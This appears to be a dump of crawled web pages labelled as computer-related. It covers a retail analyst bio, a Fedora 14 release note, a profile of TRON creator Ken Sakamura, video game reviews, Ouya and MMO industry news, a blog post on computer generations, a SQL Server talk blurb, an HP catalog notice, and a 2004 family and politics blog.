Patti was formerly a research director at JupiterResearch. Before joining JupiterResearch, she held leadership positions with leading internationally known companies like Bloomingdale's and Godiva Chocolatier. Most recently, she was director of shopping services with bloomingdales.com, where she touched on all aspects of the multichannel retail business. Brought on board to create and launch Bloomingdale's Bridal Registry website with WeddingChannel.com, Patti directed all aspects of the business from concept to implementation, including back-end customer service and store integration issues. In her previous capacities at Bloomingdale's, she led the international marketing department and implemented award-winning multiple-media marketing and retention programs. Further, Patti has done project work to develop interactive educational products for adults and children.
Patti has been quoted in major media outlets such as The Wall Street Journal, The New York Times, The Chicago Tribune, and Business 2.0, as well as in industry publications such as Internet Retailer and Executive Technology. Patti has also appeared on NBC Nightly News, CNBC, BBC, CNN, NPR, PBS, Fox Business News Network, and BNN.
She has taught eCommerce at the Fashion Institute of Technology in New York and is also the vice chairman of the board of directors for Shop.org, a membership organization that serves the online and multichannel retail community and a division of the National Retail Federation.
Education
Patti earned a B.A. in business management and studio art from Franklin and Marshall College.
Research Coverage
B2C eCommerce, Commerce Solutions, Dell, Digital Marketing, Direct Marketing, eCommerce, eCommerce Adoption, Multichannel Selling Strategies, Omnichannel Retail, Retail, Social Marketing, Social Media... | 计算机 |
2015-48/3675/en_head.json.gz/2498 | release date:Nov. 2, 2010
The Fedora Project is a Red Hat sponsored and community-supported open source project. It is also a proving ground for new technology that may eventually make its way into Red Hat products. It is not a supported product of Red Hat, Inc.
The goal of The Fedora Project is to work with the Linux community to build a complete, general-purpose operating system exclusively from free software. Development will be done in a public forum. The Red Hat engineering team will continue to participate in the building of Fedora and will invite and encourage more outside participation than was possible in Red Hat Linux. By using this more open process, The Fedora Linux project hopes to provide an operating system that uses free software development practices and is more appealing to the open source community. Fedora 14, code name 'Laughlin', is now available for download. What's new? Load and save images faster with libjpeg-turbo; Spice (Simple Protocol for Independent Computing Environments) with an enhanced remote desktop experience; support for D, a systems programming language combining the power and high performance of C and C++ with the programmer productivity of modern languages such as Ruby and Python; GNUstep, a GUI framework based on the Objective-C programming language; and easy migration of Xen virtual machines to KVM virtual machines with virt-v2v.
1 DVD for installation on x86_64 platform | 计算机 |
2015-48/3675/en_head.json.gz/4827 | TRON Project Leader Ken Sakamura
Ken Sakamura is Professor of Information Science at the University of
Tokyo, where he also serves as the Executive Director of the university's
newly established Digital Museum. He's most famous as the originator, chief
architect, and principal driving force behind the TRON Project. But in addition,
he's an architect of buildings, a designer of computerized gadgets that
defy the imagination, a consultant for technology projects in countries
around the globe--which is not to mention Japan--and he's an author and
editor of numerous computer-related books and magazines.
Professor Sakamura was born in Tokyo on July 25, 1951, which means he
reached young adulthood just as Japan's "electronics boom" and
"calculator wars" were starting to take place. Hopelessly fascinated
by electronics, after graduating from high school, he enrolled in the Department
of Electrical Engineering at Keio University from which he ultimately received
his Ph.D. in 1979. He then entered the University of Tokyo as a teaching
assistant in the Department of Information Science, and shortly afterwards
he got his big break--he was asked by the Japan Electronic Industrial Development
Association (JEIDA) to chair the Microcomputer Software Applications Experts
Committee, the goal of which was to decide what Japan should do about the
"microprocessor revolution" that had started to take place.
Unbeknownst to JEIDA officials at the time, Ken Sakamura is one "unusual
Japanese," a man driven to do with computers what no man--or woman
for that matter!--has done before. In fact, he could probably be best thought
of as a citizen of Computopia first, and a Japanese second, or maybe Japan's
ultimate "gadgeteer" who migrated from the future into the present.
Whatever, he took the sleepy committee, which probably would have produced
a ho hum report under someone else, and turned it into a launching pad to
rocket Japan into the forefront of computer architecture development. As
a result of his efforts, Japan has created two de facto real-time operating
system standards--the ITRON and CTRON architectures, both of which are "open
architectures"--and there is an excellent chance that a third de facto
standard will emerge from the indefatigable efforts to turn the BTRON architecture,
which is also an "open architecture," into a platform for advanced
personal computing applications.
Although Professor Sakamura is defensive of Japan and doesn't want to
see trade negotiators from foreign countries secure bilateral deals with
the Japanese government that turn Japan into a technological "has-been,"
he is not a xenophobe, an ultranationalist, or a person with an axe to grind.
Rather, he prefers cooperation with foreign countries and their corporations,
which is why he made sure the TRON Project and its research results are
open to anyone from anywhere in the world. In fact, he actually likes foreign
people and their cultures. His automobile of choice is a Fiat, and he likes
Scandinavian "wood culture," which he incorporated into his country
home. Moreover, he accepts many foreign students to study under him at the
University of Tokyo.
Professor Sakamura is a member of the Japan Information Processing Society
(JIPS); the Institute of Electronics, Information and Communication Engineers
(IEICE); the Association for Computing Machinery (ACM); and he is a senior
member of the Institute of Electrical and Electronics Engineers (IEEE).
His papers have won awards from JIPS, IEICE, and IEEE.
TRON Project Leader Ken Sakamura sits next to an experimental BTRON machine
in this 1985 photograph. The machine pictured pioneered the electronic pen
as a pointing device for moving the cursor via a digitizing pad between
the user's wrists. This layout was later copied in many notebook computers
due to its ergonomic efficiency, although most of those designs were based
on the use of a track ball instead of an electronic pen and digitizing pad. | 计算机 |
2015-48/3675/en_head.json.gz/5237
Last Updated: Jul 19th, 2009
Odin Sphere
Developer: Vanillaware Publisher: Atlus Genre: Action / Role-Playing Game / Hodgepodge Players: 1 ESRB: Teen By: Matt Williamson Published: Jun 25, 2007 Overall: 7.5 = Good
To call Odin Sphere a role-playing game would be to entirely mislabel it. By common understanding, an RPG mostly involves navigating menus and passively controlling the motions and actions of the playable characters. Odin Sphere is much closer to an action game with elements borrowed from many other genres: real-time strategy, beat-em-ups, shooters, and even card games. With an emphasis on action, Odin Sphere plays as if it was thrown into a melting pot of such elements and emerged as a spectacular theatrical experience that is nearly stunning, yet isn't without flaws.
The game begins with a strong presentation and sense of itself. While the opening loads, a small staff roll informs you of its director, a position usually obscured or hidden in the end credits. The first scene opens up with a young girl standing in a room with a black cat wandering around and a large hardbound book is sitting on the floor. The game's visual style becomes immediately apparent as a blend between Sir John Tenniel (the illustrator of the original Alice in Wonderland) and modern anime. The tone is also set when the player realizes that they have to pick up the book and begin reading to start the game. All five playable characters come with their own books and story lines, and you have to start "reading" the book every time you load your game. This gives the atmosphere of the story a whimsical and fairy tale feeling from the very beginning.
Directed by George Kamitani (known for his directorial debut on the Sega Saturn with Princess Crown), the game takes you through a lengthy theatrical performance on par with its inspiration Der Ring des Nibelungen (commonly known as The Ring) by 19th century composer Richard Wagner. The opera for The Ring is generally a four night performance that takes about 15 hours to watch, a feat which even rivals a back-to-back viewing of Peter Jackson's Lord of the Rings trilogy in its extended form. As a result it's very rarely reproduced, a fate that hopefully won't befall long-form, beautifully drawn, two-dimensional games such as Odin Sphere. While The Ring influenced Odin Sphere, the connections are loose, and what the director himself even calls a "Kamitani-style take on Norse mythology" as opposed to a direct re-telling.
Immediately after the abstract storybook waiting room Odin Sphere throws the player right into the story of a major conflict between nations for a cauldron that forges the most powerful gems. The importance of the gems is only initially suggested, and it takes many hours for the true significance of everything that's shown in the very early game to emerge. This isn't necessarily a benefit though. The game takes a good fifty hours (or more) to finish, and by the end you probably won't remember all the details that the game takes a meticulous joy in making seem important.
The game is ultimately a balancing act of wanting to see what happens next--and in turn putting together the overall puzzle of the narrative--and combat that can end up going on much longer than it should. The story itself isn't bad, reminiscent of the fables by Hans Christian Anderson and The Brothers Grimm. But it never goes any further than that. The conflicts are very straightforward and the enemies are mostly cut and dry. There's a bit of bleed over from the general teen angst common in many RPGs, but that's far from noteworthy inside of a medium that is awash with such stories. While hardly anything worth mentioning in the realm of literature or even theatre, the story weaves in and out of itself in a way that is more compelling and entertaining than a large portion of the current offerings.
The gameplay, like its namesake, flows in a circular formation. Each of the five characters starts out similarly: seemingly simplistic combat with easy tactics and hardly any need for strategy. Similarly, every character escalates into a fevered pitch of complex combat needs, preemptive planning, and a unique strategy in order to finish the later levels. Unfortunately, in between all this, the game waxes and wanes between tedium and excitement.
It is the real interaction with the game that drags things out more than the cut scenes. Between the High School level acting performances on the stage of the game, the player will fight through mostly similar levels with very small variations of the enemies. Some levels are more interesting and compelling, with challenging enemies that force you to constantly change your strategy, while others tend to be blander and straightforward. Though out of it all the levels remain gorgeous and infused with life: constantly flowing, moving, breathing, and overall, alluring. The levels are fast paced with wave after wave of enemies that are easily broken up into ground or air combat. The enemies don't vary much for each level internally, but all are unique to there specific location and all themed appropriately.
To add to the combat, the developers designed an ingenious way of getting health and experience: plants. The planting system works easily enough, with the player placing a seed in the ground and having it grow by absorbing phozons (the energy of fallen foes). Different seeds harvest different plants, which in turn offer different amounts of experience and health; alternatively, food grown from these seeds can be collected and used to make gourmet cuisine at one of the two restaurants nestled between locations. Potions can also be crafted by adding various fruits and vegetables into empty beakers to create an elixir ranging from helpful to useless. To not waste phozons, the player can store them in their weapon, which simultaneously increases the attack power and stores up energy for a strong attack.
The best part of all these elements is that, for the most part, they're done in real-time and integrated perfectly into the game's flow. When entering a new stage the player can plant a grape seed, kill a dozen enemies to feed the plant, cut the grapes from the vine, eat the grapes (refilling health), use the stem from the grapes in a potion, create a napalm potion, and then throw the napalm potion at an enemy to kill them. This all happens in real-time with mild pausing for item selection. And if it's done incorrectly, a potion or fruit can be knocked from your hands before it can be used properly, resulting in tension and need for planning. It's mostly seamless, fast, and streamlined making the longest part of the above-described scenario the actual combat needed to kill enough enemies to grow the grape vine.
Since each of the characters has a different emphasis, different techniques are needed in combat. Learning these new tactics is the source of much of the enjoyment in the beginning, but once these are learned they can become slightly tedious in practice. Three of the five characters play quite similarly, with close combat being their main form of attack. There are two very unique characters though, one who fires a crossbow and flies through the air (the Fairy Queen) and another who uses chains to attack at both close and long range. The placement of these characters is spaced well in-between the similarly playing sword-wielding characters. Outside of the Fairy Queen, all the characters' attacks follow a similar flow: simple combos that end in a very strong attack, as well as a separate air attack combo. The real fun comes in figuring out which technique works best in each situation.
Overall: 7.5/10
As it stands, the game is very good, but there are a few problems. The action is tough and fast enough that it will give even the most hardened gamer a run for their money, yet versatile enough that gamers who aren't as inclined toward a challenge can use their smarts instead by leveling up and creating powerful items. I personally love a good challenge, and playing the game on the hard difficulty got my slightly masochistic pleasure centers kicking. The story is engaging and well put together (if a bit overwrought), with a climactic ending that is rivaled only by the beauty of its presentation.
Many of the problems that I have with the game would be easily solved if the game was paced a bit differently and shortened. Because Odin Sphere treads the same levels over and over again - there's very little variation within each location - it hits a point near the middle of each character's story where the game wears a little thin. With a bit of editing on the story and organization (for example, there are hardly any unique locations because every character goes through nearly all the same places) Odin Sphere would be about the closest thing to a perfect action game that I've played in a long time. © 2005 Entertainment Depot [ Top ] | 计算机 |
2015-48/3675/en_head.json.gz/7295 | Ouya: 'Over a thousand' developers want to make Ouya games
By Aaron Colter
Check out our review of the Ouya Android-based gaming console.
Even after the relatively cheap, Android-based Ouya console proved a massive success on Kickstarter (the console was able to pull in nearly $8.6 million from investors despite having an initial goal of only $960,000), pundits and prospective owners of the new gaming machine loudly wondered how well it would be able to attract developers who would otherwise be making games for the Xbox 360, iPhone or PC. Assuming you believe official statements made by the people behind the Ouya console, there is nothing to worry about on that front.
“Over a thousand” developers have contacted the Ouya creators since the end of their Kickstarter campaign, according to a statement published as part of a recent announcement on who will be filling out the company’s leadership roles now that it is properly established. Likewise, the statement claims that “more than 50” companies “from all around the world” have approached the people behind Ouya to distribute the console once it is ready for its consumer debut at some as-yet-undetermined point in 2013.
While this is undoubtedly good news for anyone who’s been crossing their fingers, hoping that the Ouya can make inroads into the normally insular world of console gaming, it should be noted that while these thousand-plus developers may have attempted to reach the Ouya’s creators, the company offers no solid figures on how many of them are officially committed to bringing games to the platform. That “over a thousand” figure means little if every last developer examined the terms of developing for the Ouya and quickly declined the opportunity in favor of more lucrative options. We have no official information on how these developer conversations actually went, so until we hear a more official assessment of how many gaming firms are solidly pledging support to the Ouya platform, we’ll continue to harbor a bit of cynicism over how successful this machine might possibly be.
As for the aforementioned personnel acquisitions, though they’re less impressive than the possibility that thousands of firms are already tentatively working on games for the Ouya, they should offer a bit more hope that the company making the console will remain stable, guided by people intimately familiar with the gaming biz. According to the announcement, Ouya has attracted former IGN president (and the first investor in the Ouya project) Roy Bahat to serve as chairman of the Ouya board. Additionally, the company has enlisted former EA development director and senior development director for Trion Worlds’ MMO Rift, Steve Chamberlin, to serve as the company’s head of engineering. Finally, Raffi Bagdasarian, former vice president of product development and operations at Sony Pictures Television has been tapped to lead Ouya’s platform service and software product development division. Though you may be unfamiliar with these three men, trust that they’ve all proven their chops as leaders in their respective gaming-centric fields.
Expect to hear more solid information on the Ouya and its games lineup as we inch closer to its nebulous 2013 release. Hopefully for the system's numerous potential buyers, that quip about the massive developer interest the console has attracted proves more tangible than not. | 计算机 |
2015-48/3675/en_head.json.gz/8968 | The Crucible: We care about old computers
March 31, 2015 By Flame An Accidental Acquisition
Last year I acquired a new smartphone. The new acquisition was not out of choice but rather out of necessity. I (still not sure what happened) had destroyed my other smartphone when it fell in water after I left it on a window ledge in the house. I still wonder how a phone decided to take a leap into a pail filled with water. However, the 'usual suspects', my two kids, fervently claimed innocence and I had to accept full responsibility. Looking at their innocent 5- and 9-year-old faces, I came up with an explanation that someone must have called and the phone vibrated itself off the ledge into the pail. Anyway, the phone spent about two hours in the pail and I deemed there was no use trying to fix it. I gave it to my young kids as a plaything.
The kid inquisitor
My nine-year-old is obsessed with opening any electrical device that comes to him, a fault that has earned him my wrath several times. The new gift, the spoiled smartphone, was quickly torn apart - and I mean literally torn apart, because he used every crude mechanical trick to pry it open. After opening the phone, the questions started coming. The kid wanted to know how a device with so few small components could manage to work like the bulky PC in his room. Since I do not use a desktop, I have declared and even demonstrated several times to my kids that a smartphone is just a smaller version of a PC with similar or even superior functionality. As a result of my bragging, I had no choice but to come up with a simple way of explaining the evolution in computer hardware that has reduced the size of computers while increasing their functionality.
The historic explanation
I started by introducing the young boy to the concept of the system on a chip (SOC). When I saw the bewilderment in his eyes, I realized that I had to go back several decades in the evolution of computer hardware. I decided to classify the various integral computer ages, or changes, in terms of generations.
For the first generation of computers, I explained that the first computer, which was created in the 1940s, was really big; I told him it was the size of his room. This computer used vacuum tubes, which acted as amplifiers (making weak signals stronger), switches (starting and stopping the flow of electricity), and also as computer memory.
For the second generation of computers, I explained how the transistor replaced the vacuum tube in the late 1950s. The transistor was the first device designed to act as both a transmitter, converting sound waves into electronic waves, and a resistor, controlling electronic current. By replacing bulky and unreliable vacuum tubes with transistors, computers could now perform the same functions using less power and space.
Then I proceeded to narrate how the integrated circuit (IC) was introduced in the 1960s. The IC placed the previously separate transistors, resistors, capacitors and all the connecting wiring onto a single crystal (or 'chip') made of semiconductor material. These third-generation computers increased the functionality and reduced the size of computers considerably.
Fourth-generation computers were introduced in the 1970s with the arrival of microprocessors. Since then, the computer has evolved around the microprocessor, with the aim of reducing size and increasing functionality. Hence, our current smartphones and tablets use SOC technology: instead of a motherboard, the SOC integrates everything - processor, graphics processor, RAM, interfaces like USB, interfaces for audio, and more - onto a single chip. Although I am not sure he got everything, the boy has since stopped pestering me with this question.
Copyright © 2015 · Log in | 计算机 |
2015-48/3675/en_head.json.gz/12207 | End to End Report Creation and Management in SQL Server Reporting Services 2008
With Reporting Services 2008, Microsoft takes a step forward in presenting SQL Server as an enterprise data platform. With innovations in data regions, vast improvements in visualisation, and a new Report Designer, Microsoft SQL Server 2008 Reporting Services provides a tool that can be used by all members of the organization.
This session will begin with installation issues. You will walk through the authoring, management and delivery of reports, focusing on the new features of Reporting Services 2008, and create a report in the new Report Designer, raising awareness of report management options and the mechanisms available to deliver reports. Presented by
Chris Testa-O'Neill
SQLBits IV
WMV Video
Chris Testa-O'Neill is the founder and Principal Consultant at Claribi. An experienced professional with over 14 years’ experience of architecting, designing and implementing Microsoft SQL Server data and business intelligence projects at an enterprise scale. He has significant experience of leading and mentoring both business and technical project stakeholders in maximising investment in SQL Server and more recently in Azure solutions.
A regular and respected speaker on the international SQL Server conference circuit, and an organiser of national SQL Server conferences and events, Chris has been recognised as a Microsoft Most Valuable Professional (MVP) by Microsoft. and has been a Microsoft Certified Trainer (MCT) for the last 14 years having both authored and delivered Microsoft Official Courses. | 计算机 |
2015-48/3675/en_head.json.gz/12872 | Last year, Hewlett Packard Company announced it will be separating into two industry-leading public companies as of November 1st, 2015. HP Inc. will be the leading personal systems and printing company. Hewlett Packard Enterprise will define the next generation of infrastructure, software and services.
Public Sector eCommerce is undergoing changes in preparation for and support of this separation. You will still be able to purchase all the same products, but your catalogs will be split into two: Personal Systems, Printers and Services; and Servers, Storage, Networking and Services. Please select the catalog below that you would like to order from.
Note: Each product catalog has separate shopping cart and checkout processes.
Personal Computers and Printers
Select here to shop for desktops, workstations, laptops and netbooks, monitors, printers and print supplies
Server, Storage, Networking and Services
Select here to shop for Servers, Storage, Networking, Converged Systems, Services and more.
Privacy Statement | Limited Warranty Statement | Terms of Use ©2015 Hewlett Packard Development Company, L.P | 计算机 |
2015-48/3676/en_head.json.gz/3685 | Original URL: http://www.psxextreme.com/scripts/ps3-reviews/review.asp?revID=432
Need for Speed: Hot Pursuit
Graphics: 8.3
Gameplay: 8.5
Sound: 8.8
Control: 8.7
Replay Value: 8.6
Need for Speed is one of those iconic franchises that should never die. Despite a few lackluster installments over the years, there’s always a chance for a fast-paced racing franchise to redeem itself, and NFS has always managed to bounce back. This time around, Burnout pros Criterion had a chance to once again solidify EA’s long-running series as the premier arcade-style racing experience available. However, while the final result is always entertaining and benefits from that glossy veneer commonly associated with Burnout, I think we fall a tad shy of elite superstardom. There are a few annoying issues with which to contend, and if your PS3 isn’t online, the game becomes surprisingly bare. That being said, the sense of speed, solid technicals, entertaining multiplayer, various events, multiple hot cars, and awesome tools (road block, turbo, helicopter, etc.) make Hot Pursuit well worth playing.
As was the case with the demo, one notices that the lush environments come alive in the daytime, but become a little underwhelming at night. Seacrest County holds some breathtaking vistas and beautiful stretches of road, loaded with plenty of shortcuts, hairpin turns, and of course, the finest cars imaginable. Vehicle detailing is excellent, as are the effects; everything from the reflection of your taillights in the rain to the immensely satisfying crash effects adds a heaping helping of flavor. Some of the backdrops fail to impress when up close and personal and perhaps one could argue for a lack of sharpness, but this remains a consistent, professional visual presentation. The frame rate only hitched on me once but I could never get it to happen again, and although you’re limited to the coastal environment (no snow or lava, or anything), we’re generally happy with what we see.
The sound is just as good, if not a touch better, thanks to a diverse soundtrack that allows the “need for speed” to hit another level of immersion. There is some voice work – a woman that makes the initial introductions and informs you of new unlocks, plus radio communication – and that’s quite pleasant, and the effects that go along with the spectacular crashes are classic Criterion. Just awesome. I’m not the biggest fan of the different engine sounds, as I think they’re not quite pronounced enough, and the music would often take a back seat to the effects, but these are minor drawbacks. There’s just something about hurtling down a picturesque stretch of road at obscene speeds, the hard-hitting music urging you onward, the gritty scraping of metal on metal causing your teeth to clench, and the jarring impact of a crash leaving you breathless. This proves that Criterion did their homework; they instituted exactly what they do best, and combined it with what makes NFS great.
Just so you don’t think I’m complaining bitterly about an admittedly solid and super fun title, I’m going to start with all the positives. First on the list is the Autolog structure, which incorporates the performances of your friends with the standard Career experience. The mechanic will automatically provide recommendations from friends, give you certain goals – i.e., try to beat so-and-so’s best time – and allow you to leave messages on the Wall for bested buddies. This is in addition to the online racing but in reality, the Career mode with Autolog activated feels like a spin-off of the multiplayer component. The reason is because if you’ve got a lot of friends playing the game, you’ll soon find that a gold medal doesn’t mean quite as much as beating the times of your racing compatriots. You’ll soon find yourself replaying certain events for the express purpose of topping your friends. It’s fantastic, but I’ll come back to this in a minute.
Second on the goodie list is the accessible, reliable control that features a touch more realism than we ever had in any Burnout title. It’s still a far cry from Gran Turismo (and even from Need for Speed: SHIFT), but at least the vehicles have weight in Hot Pursuit, and they do perform somewhat as expected; i.e., as their real-life counterparts might perform. Obviously, not all cars power-slide in the exact same way, and not all can make silly turns at silly speeds but that’s the arcade aspect, and it’s absolutely essential for this franchise. That’s just my opinion, of course, but I still say NFS should never become a simulator; it should always be just like this. A little dash of authenticity is appreciated and doesn’t hinder us. Just keep that fun core that doesn’t require a gearhead mentality. Overall, the controls are responsive, the frame rate is 99% rock solid, and the smoothness and fluidity is niiiiice.
Thirdly, there are a combination of smaller positive elements that I particularly enjoyed: the sense of speed is really insane, especially if you have the misfortune of taking an overpowered car on a particularly narrow and bendy track. It keeps you pinned to the edge of your seat, where you should be for a game like this. Then there’s the freedom of bouncing back and forth between various events; you do have to unlock different events as you progress but within the first hour, you’ll have multiple options on your map. Lastly, there are the enhancements that make single-player and multiplayer action totally worthwhile; the spike strip and EMP are only two examples and they sorta give the game a Wipeout feeling. The multiplayer is a blast and almost never skips a beat. Oh, and I should probably mention the cars, because there are lots, and they’re all so unbelievably sweet; these are the most envious rides in the world.
It all gels into a wildly entertaining experience that can really hook you. But if I may…I must vent a bit. 1. If you’re going to include traffic, don’t put three cars out there. Put traffic, so we’re always expecting it and one random vehicle in the middle of nowhere won’t entirely derail one hell of a run. 2. So…even two spike strips aren’t enough to bust a racer? …really? Then what’s the point? I can damage him faster with my car. Good for finishing off, I suppose. 3. Opponents obviously have better visibility than I do. One of these days, I would just love to see one slam headlong into a car when cresting one of those blind hills. 4. Damage dealt can’t be quite that erratic. A racer has half his health left; I’m along beside him and force him into a head-on collision…and yet, there doesn’t seem to be any crash in my rearview mirror. Everything just stops and then he keeps going. Then, the very next round, he loses three-quarters of his health by smacking a guardrail. …okay.
And lastly, here's the biggest issue I'm sure other critics won't even bother to mention because they assume the entire world is connected online. But that isn't the case. It really isn't. And if you aren't online with the Autolog in the Career mode, the game loses a lot of its luster; it becomes a very straightforward, go do this event, unlock a car, go do this event, unlock a new piece of equipment, rinse and repeat about a hundred times. You can't fiddle with your cars at all, there's no story and in short, there's no incentive to hit up another event if you already passed it and unlocked the next event. On the surface, it may not seem like much to have your Friends' times posted, and to have recommendations and all that, but after playing for a while, I realized it was almost crucial to the experience. Without it, the game just isn't as engrossing. To call it a borderline MMO-Racing title is inaccurate but this emphasis on social participation is obvious, and the solitary, unplugged player does suffer.
Also, let’s not forget that EA Online Pass program; if you buy the game new, you’re fine but if you buy it used, you need to fork over the $10 before you can connect to their servers. And for a game like this, that’s sort of a big deal. This all being said, what lies at the center of Need for Speed: Hot Pursuit is worthy of praise and as a direct result, is worthy of your time and money. The good absolutely outweighs the bad and I freely admit that my complaints in this review can be deemed as very subjective; other racers may not have been quite as frustrated quite as often. Therefore, considering the extraordinarily well-done production on the whole, from the diverse events (chase or race is always an appealing contrast) to the crazy sense of speed to the Autolog to the accomplished technicals to the super cool equipment…it’s just dripping with classic NFS attitude. And that’s hardly a bad thing.
The Good: Mostly pleasing graphics and great sound. Reliable, accessible control. Diverse events. Wicked cool cars and equipment. Race or chase is a perfect contrast. Great sense of speed. High longevity. Autolog is an addictive feature.
The Bad: Some backgrounds are unimpressive. AI blessed with ESP. Erratic damage dealing. If unconnected to the Internet, experience loses some appeal.
The Ugly: “One car…just one car in the middle of effing nowhere…I had it…I had it…”
11/20/2010 Ben Dutka | 计算机 |
2015-48/3676/en_head.json.gz/3737 | What's New? 2004-11
Friday 19 November 2004 Oh, this has been a heck of a week: we come to realize that the roof needs replacing, the car's alternator isn't working (well, I guess it could be the battery), and my PowerBook isn't able to see the internal hard drive for the second time in as many months. I rant.
Thursday 18 November 2004 Dziadziu joins us at Peabody Elementary for a fund-raiser spaghetti dinner (for Mrs. Wong's fourth-grade class trip to Sacramento). The bizarre tale revolves around our family members each winning something from the raffle. Rose won a basket of house-cleaning supplies, then Isaac won a blanket, then Lila a stuffed kangaroo, and then I won a bar of "French milled soap" made in China. A few people won things in-between our winnings, but it was embarrassing and not just a bit eerie.
Tuesday 16 November 2004 À propos of nothing at all, this is the second time in as many days that I've heard or read about Lieutenant General John F. Sattler, the Commanding General, First Marine Expeditionary Force, Camp Fallujah, Iraq.
First off, any time one hears one's name spoken (on the radio, in this case) attention is given. Second, the father of one of Isaac's schoolmates is a private telecommunications contractor currently in Fallujah, and his wife is pregnant, and so we jump a little every time we hear the town of Fallujah mentioned.
When I was in the service there were very, very few Sattlers to be found.
Monday 15 November 2004 This photo of Anna Nicole Smith being "assisted backstage" at the American Music Awards (AP/Reed Saxon; used without permission) just tickles me. I'm not the only one who finds this funny: fark.com ran a commentary thread entitled "Anna Nicole Smith: drunk or just mildly retarded?"
Sunday 14 November 2004 The Emperor has no clothes. That's what I was thinking after a meal at Café Jacqueline (in North Beach). Chef-owner Jacqueline Margulis is the only bright spot in this otherwise pretentious eatery, and she was so nice that I'm really sad I didn't like the food, service, or wait staff. People who know me know I love food of all cuisines. So this isn't an "I went to a soufflé place and all they had was soufflés" kind of review.
Between the six of us we tried five soufflés: three main courses (salmon and asparagus, leek and chestnut, and chanterelle mushroom and garlic) and two desserts (bittersweet chocolate and Grand Marnier).
The server said it best: "you can't really taste the mushrooms, you feel the mushrooms." That was it, in a nutshell (so to speak). There are so many places in the city to eat from which one walks away saying "wow! what an experience!" that this seemed so underwhelming.
Suggestions: B44 (Catalan), Osteria (Italian), Blowfish (sushi), Mom Is Cooking (Mexican), Picaro (Iberian), Red Grill (American).
Tuesday 9 November 2004 I've been watching Michael Palin's Himalaya series. There's nobody I'd rather hear talking about travel than him, and I have audio versions of several of his other adventures, but he seems a bit, well, off his game this time around. It seems a bit pro forma, with none of the insight or witty curiosity I've enjoyed in Around the World in 80 Days or Full Circle.
Travel documentaries make me feel wistful, even sad. I'll never have the resources to see as much of the world as I want to. I want to watch along, I want to turn away. But I always turn back.
Much of my unease stems from living on the wrong coast, as it were. Europe, from Scandinavia to Italy, has been my favorite stomping ground. I can be understood all over, using some of the languages I know. We're near to Asia, here in San Francisco, but so far I haven't had the time and energy to roam through those countries. Omi Marga and I have always wanted to take a trip to Japan, but so far we haven't.
The Mozilla Firefox 1.0 web browser is released today. Is this going to be significant? I'm not sure. Certainly the efforts over the last half-dozen or more years in going from Netscape to Mozilla Firefox have not been either easy or quick, but their hearts are in the right place, and I hear the code is pretty good.
They *do* have a really great graphic, shown at right.
Every web browser is a compromise in look-and-feel. The art is in picking one with which you're comfortable, which extends your reach in ways which match your style. I've given up on Apple Safari in favor of OmniGroup OmniWeb; that's not to say I'm satisfied with my choices.
I'm hoping that the combination of open source code, a community writing plug-ins and extensions, and its platform-agnosticism - available for "Mac OS X", Linux, and Windows - carry some weight in a world which has spent too much time writing websites to deal with the poor citizen which is Microsoft Internet Explorer. To that end, Firefox will succeed if it reaches critical mass, and becomes the standard to which others make sites. Let's hope.
Saturday 6 November 2004 First thing this morning, after breakfast, Rose to Isaac and Lila to the West Portal School library for a Music Maker program. I hear the kids loved it. I don't know because I was at home, waiting for friends to drop off a king-sized mattress at the house. (Postponed until tomorrow evening.)
A substitute teacher of Isaac's is also a producer at Spinning Wheel Productions. They're filming a series of multicultural storytelling videos for children. This morning I drove Isaac to the studios of San Francisco Community Television, cable channel 29, for Story Circle: Stories from Asia.
Kids should not wear white, blue-screen blue, shiny materials, or too "busy" a pattern (which results in Moiré patterns on-screen). Check. Good breakfast. Check. Went to the bathroom before the story. Check.
Then we headed over to the Randall Museum to see the model trains. It was a boffo hour of fun.
Given that Isaac is dealing with a cold, he did a great job. We have some family things planned for tomorrow. I hope they go as well as today's goings-on.
Tuesday 2 November 2004 Much of the conversation these days revolves around how bad things will be four years from now.
The Canadian government has announced that Americans wanting to emigrate are welcome, but will have to follow the standard procedures, which take around a year. And having a job is either required or is a big bonus. And in that vein I came across this picture today. It sums up much of what many of us are feeling. We may not be ready to secede, but we're already focussing on things below our feet whilst trying to not think about being under the evil soul-sucking, corporate-beholden, dim-bulb government that our fellow citizens have chosen.
Wednesday 3 November 2004 Being a liberal in America is like a bad dream that goes on and on and on. It certainly feels as though we chose the greater of two evils. Sigh.
In an election where the best thing that could be said about John Kerry is that he might carry the "Anyone But Bush" vote, I think it's safe to say that he wasn't the right candidate. I certainly felt Howard Dean was more interesting, and Joseph Lieberman more stimulating. Meh.
In hindsight, I wish it had been Howard Dean instead of John Kerry. I think we all missed a great deal when we passed over exciting, emotional, and motivated in favor of staid, stoic, and even-keeled.
Said the father of Boing Boing creator Cory Doctorow about these election results:
"...The way you feel now is exactly how I felt when Nixon won a second term -- crushed. I just couldn't believe America was that stupid...."
Later in the day I see this map from a Jeff Culver in Seattle, who says: "I was thinking today about how the 'red v. blue' states graphic is really misleading considering the slim margins that the candidates won some of those states by, so I sat down and created the map..."
Tuesday 2 November 2004 We voted in the mid-afternoon. One of the poll-workers remembered the kids from our visit last year. We took the three sheets and a pen and sat down and filled them out as a family. Both Isaac and Lila got many chances to mark our choices. The news started out sounding good:
Monday 1 November 2004 Tomorrow we have an election. An election I suspect we'll be remembering almost as long as the "won 500,000 more popular votes but had the election stolen by the Supreme Court" events of 2000. Why? Well, there's the war in Iraq, three Supreme Court justices likely to be replaced in the next four years, a woman's right to choose abortion, stem cell research, and the all-pervasive decline in civil rights and tolerance seen in the last four years.
Whether you think of this guy as a cocaine-using drunken frat boy incompetent or a strong leader in tough times, the next four years are going to be very frustrating for about half of our population.
Standing on the bones of many, many failed massively multiplayer role-playing games, the age of the subscription-based game seems to be well and truly over. In 2012, four major MMOs opened for business in the US and of them, only Guild Wars 2 is holding onto its original business model. Star Wars: The Old Republic, TERA Online: The Exiled Realm of Arborea, and The Secret World, meanwhile, all had to transition from subscriptions to free-to-play. The writing for subscriptions is on the wall, but some publishers are pushing forward. Square-Enix is keeping subscriptions for its MMOs, including the upcoming Final Fantasy XIV: A Realm Reborn. “With the free-to-play model, you’ll get huge income one month, but the next month it depletes,” Naoki Yoshida, A Realm Reborn’s director, told The Penny Arcade Report on Friday, “Most MMOs have investors in the background, and the company uses the profit and splits the profit with the investors. But, if the game’s not successful, and it doesn’t reach the target, then they have to switch to free-to-play to try and get just a little profit from it. Among the MMOs in the market, only Blizzard and Square-Enix are making money without investors in the background.”
